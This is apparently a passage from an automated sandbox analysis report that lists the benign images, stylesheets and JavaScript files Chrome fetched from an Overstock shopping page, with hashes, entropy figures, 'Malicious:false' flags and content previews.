                                                                                                                                                                                    SSDEEP:48:5Il/XflJM+jPGaNOgm1PtCsODS0qmQQa1jRp:5Il/XvM+LGasgm1PtDwqmar
                                                                                                                                                                                    MD5:A7024F9CBAC6F4D8549B4429FE9BAAB0
                                                                                                                                                                                    SHA1:F71F949B7E92D4AB5F16DBE898255EA31A611C42
                                                                                                                                                                                    SHA-256:1CE2E5870FBBDAEBB6DD26C61CCA57460042FCDE066AA3A1032FAFF71B7207C3
                                                                                                                                                                                    SHA-512:07DDF84DE97EE5AA5586BCF0EFB0F1D908C4E6A6A955330E4DA6024DAEFD2CE163C5E44B26F6B11AD10BD214EEE0B75BC92F5D5B32C72817294132EF745C384B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_6ce1441f-7fba-404c-bc05-73130613697a.jpg?v=1729322986&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 D...p....*P.P.>1..C"!..L.. ....f.;.}m.........k.........b..S.6...U..;L....]jSqf.......@....EM| ..`.Yh.y...S...o....v..._-B<7.<...].....).3].}....~..>..uP$'.._.!.nU.ow6H...H.@.e.5.v...y...........D.z....Z..(.V.8^..o\.I.....1.`_.TbD."u.vW..(J{.|....M..+.=.z|..<{.....{.......u.Gob>PU"2..#/..[..A.......}....L>....1..9....!.q......o../.?...>m"J.d>5.zA^^.uO..<._.4...._~..V:.7s..P...>y...q..z....M6..C]..7a.....b..W.t..x.".=*b.....X..!.c'.;............y....L'.......T.....xC$.n.7..............><P3.h....7........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2172
                                                                                                                                                                                    Entropy (8bit):6.892879165388196
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxS7qUfji3g395aGVMRVs3vvHh:NBIl/XrxS7dognFXh
                                                                                                                                                                                    MD5:7280F7719788466374CAB15860057CAA
                                                                                                                                                                                    SHA1:BB831C9CA59DC37CBCE512BF4C75901895E6634E
                                                                                                                                                                                    SHA-256:60C2FB6B60805CCECB43D4E0279167721E22B666A13F3325B2F48563B64D95A3
                                                                                                                                                                                    SHA-512:AEC931A19745CDCDC6C5115E4ECAC1DDF4A3C7EE9CF94645081498FC0785F4381E79F0809408445916BC555897985CC6485A79EBE9FE06A7B127346A4C5A33F5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P........................................................................................< r.p.r...S'.&......I.....Oz...XZ...&A.D.,.]]..]gt>6.G._y.T]cxz&M...5...IMo.2+..}|.m..si.n....m.fU...n...........8.........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 109
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):121
                                                                                                                                                                                    Entropy (8bit):5.8560255601330455
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:FttXz673HKnQ2OmYcDBAymRdgee1yqBqACnwyRZGHm4up5XyN7n:Xtj6zHKJKcdAykGXsAATD9JyN7n
                                                                                                                                                                                    MD5:CA7366E3E08A5F2B9CAAAB7DAA8757B1
                                                                                                                                                                                    SHA1:9CCD37E55FCC8A0D8BFA2D04CF2ABA3907C2CF51
                                                                                                                                                                                    SHA-256:3C7B695721ABBBFCD88877381B0E3A2F00D19B71E7F50E2540E407A25656432E
                                                                                                                                                                                    SHA-512:FD56DD96325DB11A2941AEC9CBAAC2BD7698BF83B4F094D958FBD014C758D302962B1C27A589F0783F1B5B511F261EAAA46F7AF3B673CDEC81DBAA5E0BA944DE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:...........V*.I,)-V.Rrrt..r..u..Q.Q*...M,....&....(x...)............'.....A..rSK2.S...]C..2....K..K...JRS.j...>qm...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (528), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):528
                                                                                                                                                                                    Entropy (8bit):5.090026710282309
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:EOB3+3XVzRNV07Dyl3PdtnRIBY22BZG2XuhFlewO:E8AxjW2BZG2SFEwO
                                                                                                                                                                                    MD5:B743C876511F91DEB2857DC58436D3CA
                                                                                                                                                                                    SHA1:ACF3BD4D73CE0D30BB717C6453B8A7619C2B31A6
                                                                                                                                                                                    SHA-256:AE1EB9704D18EEAC7E47ECEE6EF309E3C1BC0D8CA7E5367B6C33A45FE00A26B4
                                                                                                                                                                                    SHA-512:597F64EFABC86EA4279FA01B3B0351447096BDD79EE164653A917F4EC11369D3B9F6FBF41E54F18F0FCA251DAF6FBD2C0013DEAA2E33EA4CDD6E2B61B80EB47E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/homepage/_next/static/css/afe49259c2a12924.css
                                                                                                                                                                                    Preview:body,html{padding:0;margin:0}@font-face{font-family:Termina;src:url(https://ak1.ostkcdn.com/font/Termina-Bold.woff);font-weight:400;font-style:normal}a{color:inherit}a,a:active,a:hover{text-decoration:none!important}a:focus-visible{border:2px solid #0172a0;text-decoration:none!important}*{box-sizing:border-box;font-family:Helvetica Neue,Helvetica,Arial,sans-serif}.universalSpacing{padding:16px 16px 40px;width:100%}@media only screen and (min-width:480px){.universalSpacing{padding:24px 16px 56px}}a:focus{outline-offset:1px}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):69
                                                                                                                                                                                    Entropy (8bit):4.087898688625098
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YUzIwCfroKH9cSLJfRiI2HLCf6n:YUzjCfroK24tRt2rCf6
                                                                                                                                                                                    MD5:2D964E8A700809EC78091E2C67F65CF9
                                                                                                                                                                                    SHA1:D7F3081BEE6E506DF8469C68B8F92575CA43EB74
                                                                                                                                                                                    SHA-256:B86851FE85765C4D90E9AF04BDD726F9F58002A0130E81F907B65DC88A25218F
                                                                                                                                                                                    SHA-512:F3B804985AE1DFF0D3419ED4ADF2BD72632E0DFE3BBE728FE7AF6CCC0E71EB02BF5585AB431A80CC4F42B3B054D48B19F90884737B8CF78EE89E96A5A0D8B36A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://api.tapc.art/capture-kit/?shopStore=&appId=m3Lkr2oxDy
                                                                                                                                                                                    Preview:{"qrCode":{"enabled":false},"mobileDownloadBanner":{"enabled":false}}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3113)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):97148
                                                                                                                                                                                    Entropy (8bit):4.816769827704925
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:2iVgjKXNLOiMzqTTlANlKdAblBBACksWFwcPxibCu+BxvDp0:SjKXNLOiMzrBAwIwcPWsxvG
                                                                                                                                                                                    MD5:D571B59F501ABBB47EC750139120C900
                                                                                                                                                                                    SHA1:BBC390CF4E067312F5BDB9B292CFFAB9C716CE69
                                                                                                                                                                                    SHA-256:B68BD76B43B3E896AD523C8706A7F7341ABF1429B4582737860F038DAB7D6396
                                                                                                                                                                                    SHA-512:A4D64B0651BF7F50594547FEBAFC6D38C0CD85207707646D9C950F0F0713BF2729E5214EBD1EE068DE2E20382D47B77503AB0B17B7F9A2960421CDF9B5F05BFE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/extensions/162002f6-08d7-4b02-b4ce-48655f8f0c90/kite-free-gift-discounts-409/assets/customDiscountLogic.js
                                                                                                                                                                                    Preview:console.log("inside customDiscount.js");..const BXGY_ICONS = {. DISCOUNT_TAG_ICON_FILL : `<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40" fill="none">.<path fill-rule="evenodd" clip-rule="evenodd" d="M20.2835 5.83398C21.4002 5.83398 22.4502 6.26732 23.2335 7.05065L32.7502 16.5673C34.6502 18.4673 34.6502 21.534 32.7502 23.434L23.4335 32.7507C21.5168 34.6673 18.4335 34.634 16.5668 32.7507L7.05016 23.234C6.26683 22.434 5.8335 21.4007 5.8335 20.284V9.51732C5.8335 7.48398 7.4835 5.83398 9.51683 5.83398H20.2835ZM20.1002 13.6507C19.1335 12.684 17.5335 12.684 16.5668 13.6507C15.6002 14.6173 15.6002 16.2173 16.5668 17.184C17.5335 18.1673 19.1168 18.1507 20.1002 17.184C21.0668 16.2173 21.0668 14.6173 20.1002 13.6507ZM10.0002 10.834C10.0002 11.3007 10.3668 11.6673 10.8335 11.6673C11.3002 11.6673 11.6668 11.3007 11.6668 10.834C11.6668 10.3673 11.3002 10.0007 10.8335 10.0007C10.3668 10.0007 10.0002 10.3673 10.0002 10.834ZM19.9002 26.3507C20.8835 27.334 22.4668 27
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (38868), with LF, NEL line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):239533
                                                                                                                                                                                    Entropy (8bit):5.35897836836547
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Q4DLZ59p9gl3Mh++mwSZmB0+fUd5MNaBTT2Wsg6:Q4DLjCl3j+mFpkUhTy5
                                                                                                                                                                                    MD5:F9483F0A62CDC235C3C68BF346E73063
                                                                                                                                                                                    SHA1:95C05F4D2DA9DFCC2D16E62E71EEECE1314D5E9F
                                                                                                                                                                                    SHA-256:415549AB1F904263D123E643E2450C3C34BE866D325E20DFD72D82EBD18CD773
                                                                                                                                                                                    SHA-512:535D4E18983E56AC1F0AE491B9FAC49914C0011899B57F63BB470007AF6671CDD65CB095EF1C10CA5528F9AF1FC403ED4657E390012B44BEC4D5786A7DDD603A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.(self.pwrClg=self.pwrClg||[]).push([[8],{36984:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.BLANK_URL=t.relativeFirstCharacters=t.whitespaceEscapeCharsRegex=t.urlSchemeRegex=t.ctrlCharactersRegex=t.htmlCtrlEntityRegex=t.htmlEntitiesRegex=t.invalidProtocolRegex=void 0,t.invalidProtocolRegex=/^([^\w]*)(javascript|data|vbscript)/im,t.htmlEntitiesRegex=/&#(\w+)(^\w|;)?/g,t.htmlCtrlEntityRegex=/&(newline|tab);/gi,t.ctrlCharactersRegex=/[\u0000-\u001F\u007F-\u009F\u2000-\u200D\uFEFF]/gim,t.urlSchemeRegex=/^.+(:|&colon;)/gim,t.whitespaceEscapeCharsRegex=/(\\|%5[cC])((%(6[eE]|72|74))|[nrt])/g,t.relativeFirstCharacters=[".","/"],t.BLANK_URL="about:blank"},48068:(e,t,r)=>{"use strict";t.o=void 0;var n=r(36984);function o(e){try{return decodeURIComponent(e)}catch(t){return e}}t.o=function(e){if(!e)return n.BLANK_URL;var t,r,a=o(e);do{t=(a=o(a=(r=a,r.replace(n.ctrlCharactersRegex,"").replace(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):79
                                                                                                                                                                                    Entropy (8bit):2.716326985350135
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:tQTltaL5UJjV9GjUJjVE:6XG5UJjGjUJj2
                                                                                                                                                                                    MD5:8E3DB10AF5A3E1CABE7AA67674E21188
                                                                                                                                                                                    SHA1:E2314B0038DF2D49DDBE461F33A6797D4586CDE0
                                                                                                                                                                                    SHA-256:87ECD5BABD6FD9F4F6F796D745AA38751FAF3985E3B55F87A2F53E506FE07362
                                                                                                                                                                                    SHA-512:A4F136016F4591E021D54F06141896581371828BF02F662A050B2A36567DFEC6068A4C758815D481E01BD7D68692329B5EE228C854AB2D85246D05B56692FB09
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[71, 73, 70, 56, 57, 97, 1, 0, 1, 0, 0, 0, 0, 44, 0, 0, 0, 0, 1, 0, 1, 0, 0, 2]
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):35978
                                                                                                                                                                                    Entropy (8bit):4.9214403502286475
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:kKzXbKOIEkFaXHXdXGXO523FkcKJROfi6VVeqOO:kKzXbfIbaXHXdXGXO523KcKJROfi6VV9
                                                                                                                                                                                    MD5:CD97A8EA77B570DC426DE8111060CA4D
                                                                                                                                                                                    SHA1:976C508F2F407AE72C2E7DE92F045D62EB25AA1D
                                                                                                                                                                                    SHA-256:AA77E2479AC8572217DD35D3A2C9D283E06E2D831B2F3B7BCA4AF24683FEFAF3
                                                                                                                                                                                    SHA-512:2B7A0103474EABC36780126CAAB362AC56DB9337CF5E4367E0B0A84DE7C0015E1CB6DE35D968106E2124DF0419E36996B4123FA847B6608B2D84D4102DDD7B14
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/extensions/162002f6-08d7-4b02-b4ce-48655f8f0c90/kite-free-gift-discounts-409/assets/shippingDiscount.js
                                                                                                                                                                                    Preview:console.log("inside shippingDiscount.js");..let gfgShippingDiscountV2 = {. state: {. isFirstRenderForShippingDiscount: true,. productFound: {},. productVariantFrount: {},. collectionFound: {},. appBlockKeyMap: {. tBarHeadingFontSize: "titleBarHeadingFontSize",. tBarHeadingFontWt: "titleBarHeadingFontWeight",. tBarSubHeadingFontSize: "titleBarSubHeadingFontSize",. tBarSubHeadingFontWt: "titleBarSubHeadingFontWeight",. tBarTextColor: "titleBarTextColor",. tBarBackgroundColor: "titleBarBackgroundColor",. widgetBodyFontSize: "widgetBodyFontSize",. widgetBodyFontWt: "widgetBodyFontWeight",. widgetBodyBackgroundColor: "widgetBodyBackgroundColor",. widgetBodyBorderColor: "widgetBodyBorderColor",. },. },. init: function () {. try {. let settings = gfg.settings;. let _shippingDiscountData = settings.shippingDiscount;.. const page_type = gfg.f.getPageType();. if (page_type === "product") {. gfgSh
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):99877
                                                                                                                                                                                    Entropy (8bit):5.287661348034516
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:OmzvhHYwwuMGrdToj42tMmqpnp+ny80HtcuXX:BYDMmqpwxuH
                                                                                                                                                                                    MD5:0257750A4598BB1C7F20C16C396F97F3
                                                                                                                                                                                    SHA1:743283FA63C57DB4112C503CBDE110E0D5B88B02
                                                                                                                                                                                    SHA-256:D67000E5EAEA2B8B7419DDF5C2F67E93A5C5962BC1CBCF1CA212AC6BD56D64D8
                                                                                                                                                                                    SHA-512:23F2E70EEBF9761527A75A89C31AAB6EC3E4814478C7FA297376FA4446F59FC416F7FA45F1B326899615A39A3C9F5E5AB1EC4519C8997F44AB504D2E54FDBF51
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/homepage/_next/static/chunks/main-040515782a7dd7cd.js
                                                                                                                                                                                    Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{932:function(e,t){"use strict";function r(e,t,r,n,a,o,i){try{var u=e[o](i),c=u.value}catch(s){return void r(s)}u.done?t(c):Promise.resolve(c).then(n,a)}t.Z=function(e){return function(){var t=this,n=arguments;return new Promise((function(a,o){var i=e.apply(t,n);function u(e){r(i,a,o,u,c,"next",e)}function c(e){r(i,a,o,u,c,"throw",e)}u(void 0)}))}}},6495:function(e,t){"use strict";function r(){return r=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},r.apply(this,arguments)}t.Z=function(){return r.apply(this,arguments)}},2648:function(e,t){"use strict";t.Z=function(e){return e&&e.__esModule?e:{default:e}}},1598:function(e,t){"use strict";function r(e){if("function"!==typeof WeakMap)return null;var t=new WeakMap,n=new WeakMap;return(r=function(e){return e?n:t})(e)}t.Z=function(e,t){if(!t&&e&&e.__esModule)return e;i
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (32461)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):69246
                                                                                                                                                                                    Entropy (8bit):5.499115539817298
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:d2fwG1e7F2fy+WdsnMat95WnKFN0mI5KhvyEpH8dInSQu4cSStUkk0og0t:d2fIRZ+WOnZj5WnKFNY5KJpHNSQgWkk1
                                                                                                                                                                                    MD5:C8CE6A273CD1FD679985F0CFE1F63170
                                                                                                                                                                                    SHA1:066BE33802F4697A29C3A49DAD1A81785D8514A5
                                                                                                                                                                                    SHA-256:D83B7F084326A698DEC02C1131ECDB4E0D8432342AC8E4AC043A1BC80F5B1DA0
                                                                                                                                                                                    SHA-512:0BCDAC57F62C425D054CCA1D1C2459B0DC2C5548F8B6B26AD871B679A65A1FC7B302A61C181C977DA10223BB408E805FF82B362D503C16714DBFFFAFD3C4B2DA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/**. * name: @tapcart/webbridge. * version: v1.10.0. * description: Tapcart WebBridge SDK. * homepage: https://github.com/tapcartinc/tapcart-webbridge. */.(function(){"use strict";try{if(typeof document<"u"){var e=document.createElement("style");e.appendChild(document.createTextNode(".tapcart-webbridge #tapcart-web-banner{display:none!important}.tapcart-webbridge footer,.tapcart-webbridge header,.tapcart-webbridge #footer,.tapcart-webbridge #header{display:none}.tapcart-webbridge iframe{display:none}")),document.head.appendChild(e)}}catch(t){console.error("vite-plugin-css-injected-by-js",t)}})();.(function(ae){typeof define=="function"&&define.amd?define(ae):ae()})(function(){"use strict";const ae=t=>t&&Object.keys(t).length===0&&t.constructor===Object;function rn(t){const e={};if(!Array.isArray(t))return e;for(const r of t)r&&r.name&&r.enabled&&(e[r.name]=r);return e}const nn=t=>{if(!t)return{};const e=n=>Array.isArray(n)?n.reduce((a,{namespace:s,key:i,value:o})=>(a[s]?a[s][i]=o:a[s]=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):68
                                                                                                                                                                                    Entropy (8bit):4.553070246726259
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:4+vO3avEJIDYm2pvEJxCn:4+vOFuDSKqn
                                                                                                                                                                                    MD5:F47933B7D95BF214CEBD5112CBA23CF7
                                                                                                                                                                                    SHA1:A1AED97E0EC3C4CAF0EBBE22B6B73EF6E31CAA66
                                                                                                                                                                                    SHA-256:6226BE667A498CB34735B3278954663684D4FACE7C6B3B9A5B51FC74118D87D5
                                                                                                                                                                                    SHA-512:F11A2BD03EA0EC08A86736F9E0211A168A2435C22D259000A031C210052CFE8484BFF9885962DCEB05BAF0FDA0E66D6E225D7DEBF7F5C5B10A25E4261EBC9681
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/DutyOptions.Bd1Z60K2.css
                                                                                                                                                                                    Preview:[dir=ltr] .LkR2o{text-align:right}[dir=rtl] .LkR2o{text-align:left}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6473
                                                                                                                                                                                    Entropy (8bit):4.097611889216991
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:S0qITo4EXhwl567flAbTy8gUNaK82nNmxAOyycoXPd2UDF9Xpl6Bk1RPM50H:Nqd5hiIflASMfDyyJofYUFx63GH
                                                                                                                                                                                    MD5:A80A6965F9FF9356D38E10091D2CF40B
                                                                                                                                                                                    SHA1:FB14C4F963D6A2EA40DE731FDACCC4B09786584B
                                                                                                                                                                                    SHA-256:B4A38F8314E6B7F88D89552F0503464F57B261DB56AC0D2EC21C768D89DAEB78
                                                                                                                                                                                    SHA-512:F77D7B9671816D41D9698383E57002915A986B73CC0CE9E8ED8F37824D8C15BF7745B65E93695405E9D15508F86176266BC8128F2348EDC846EDC7D00CD7581D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="179" height="66" viewBox="0 0 179 66" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_168_172)">.<rect x="0.868391" y="65.1316" width="64.2632" height="177.263" transform="rotate(-90 0.868391 65.1316)" stroke="#002855" stroke-width="1.73678" stroke-dasharray="14.05 4.23"/>.<path d="M28.0393 23.7189V39.6615C28.0393 40.8753 27.8721 41.9267 27.5375 42.8156C27.203 43.6376 26.6582 44.3401 25.9032 44.9231C24.632 45.9076 23.0167 46.3998 21.0573 46.3998C18.945 46.3998 17.3249 45.9458 16.1971 45.0378C15.0693 44.1298 14.3716 42.7152 14.1039 40.7941H19.982C20.0203 41.6352 20.4217 42.0557 21.1863 42.0557C21.6738 42.0557 22.0179 41.8837 22.2186 41.5396C22.4193 41.2051 22.5197 40.6459 22.5197 39.8622V37.4106C21.497 38.7487 20.2927 39.4178 18.9068 39.4178C17.4062 39.4178 16.1923 38.6866 15.2652 37.2242C14.3477 35.7619 13.8889 33.8407 13.8889 31.4608C13.8889 29.0905 14.3477 27.1502 15.2652 25.6401C16.1923 24.1395 17.3919 23.3892 18.8638 23.3892C19.5424 23.3892 20.1
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5992)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6091
                                                                                                                                                                                    Entropy (8bit):4.968528413803144
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:RvWdi2jkoBS4z0J4T0VnOHy+OkWa3jiXQs5dJSyLMZ+x3Eu0QF1eUFl:RvWdEooB1CjWa3jixdzLjVEujnesl
                                                                                                                                                                                    MD5:06DAE6D840E1DE38935FB53C3D877D37
                                                                                                                                                                                    SHA1:D8B0A0C1D11562248DC11FA84527E4F8EEE671AA
                                                                                                                                                                                    SHA-256:2D4BE43A243E6073DB8C0B4B71A1F9DB54FD3CF8487DB39AB60F0D45BBB48D32
                                                                                                                                                                                    SHA-512:4AF6517D6035DBC333C44F761CB252893506790A5E2416DB55D8111C05316A6907701C9DBAA4D0187011070C98654B1F0BEB7F661D940BC94228D8CA721C3679
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:if(!customElements.get("custom-select")){class CustomSelect extends HTMLElement{constructor(){super(),this.button=this.querySelector(".custom-select__btn"),this.listbox=this.querySelector(".custom-select__listbox"),this.selectedOption=this.querySelector('[aria-selected="true"]'),this.selectedOption||(this.selectedOption=this.listbox.firstElementChild),this.setButtonWidth(),window.initLazyScript(this,this.init.bind(this))}init(){this.options=this.querySelectorAll(".custom-select__option"),this.nativeSelect=document.getElementById(`${this.id}-native`),this.swatches="swatch"in this.options[this.options.length-1].dataset,this.focusedClass="is-focused",this.searchString="",this.listboxOpen=!1,this.selectedOption=this.querySelector('[aria-selected="true"]'),this.selectedOption||(this.selectedOption=this.listbox.firstElementChild),this.addEventListener("keydown",this.handleKeydown.bind(this)),this.button.addEventListener("mousedown",this.handleMousedown.bind(this))}static getNextVisibleSiblin
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (21856)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):52387
                                                                                                                                                                                    Entropy (8bit):5.397303672227873
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:KXn2+GjozCrDHJVZ/9ywhENZNtT3YH6/90l:KXnp2ywhENZrYHa90l
                                                                                                                                                                                    MD5:7EE104753099F9F00003724EB0A4C433
                                                                                                                                                                                    SHA1:1D755195CA80161CA0D9694E4A1A18B42720A0AC
                                                                                                                                                                                    SHA-256:0BA6B163F965F258C24888CF11C6DFE0D044DE0800284DA2E78A3FAF7BD12925
                                                                                                                                                                                    SHA-512:CB0916F1D31C1D73DAC81D742B38F239B5B07A9C84560EA318E6D05BCE16721433B722035143E0F642B1EB136577BD2416719B4BEBED37AEB048700C4EC8FE1F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://websdk.appsflyer.com/?st=banners&
                                                                                                                                                                                    Preview:.!function(e){var n={};function __webpack_require__(t){if(n[t])return n[t].exports;var r=n[t]={i:t,l:!1,exports:{}};return e[t].call(r.exports,r,r.exports,__webpack_require__),r.l=!0,r.exports}__webpack_require__.m=e,__webpack_require__.c=n,__webpack_require__.d=function(e,n,t){__webpack_require__.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:t})},__webpack_require__.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},__webpack_require__.t=function(e,n){if(1&n&&(e=__webpack_require__(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(__webpack_require__.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var r in e)__webpack_require__.d(t,r,function(n){return e[n]}.bind(null,r));return t},__webpack_require__.n=function(e){var n=e&&e.__esModule?function getDefault(){return e
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (971)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1077
                                                                                                                                                                                    Entropy (8bit):5.271690404244637
                                                                                                                                                                                    Encrypted:false
